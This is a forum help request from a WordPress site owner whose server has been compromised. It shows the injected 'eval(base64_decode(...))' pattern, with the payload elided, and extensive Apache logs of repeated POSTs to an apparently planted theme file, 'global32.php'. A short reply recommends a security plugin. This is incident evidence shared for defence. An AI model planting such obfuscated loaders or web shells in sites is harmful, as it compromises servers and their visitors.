Question

DigitalOcean WordPress instance getting attacked

Hey,

I’ve got a WordPress instance set up from the one-click DigitalOcean installer. It runs fine most of the time but I keep getting attacked, causing the site to go down.

I have already set up Jetpack as described in this article to prevent RPC attacks, but I still seem to be getting screwed.

This keeps getting injected into my PHP files (wp-config.php, index.php, wp-settings.php, etc.):

eval(base64_decode("..."));

I believe RPC is working as when I check attacks they are all just Jetpack. The results from (grep xmlrpc /var/log/apache2/access.log) are:

108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"

There are some fishy-looking POSTs in my Apache logs, but not sure if related:

162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

At the moment I have been going through and removing all the 'eval('s to get my site working again, but this is hardly a long-term solution. Need some help getting this fixed.

Cheers, Sebastian



@sebastiankade

There are a few plugins that you can enable to tighten up security – such as Wordfence Security. A plugin, however, will only carry you so far.

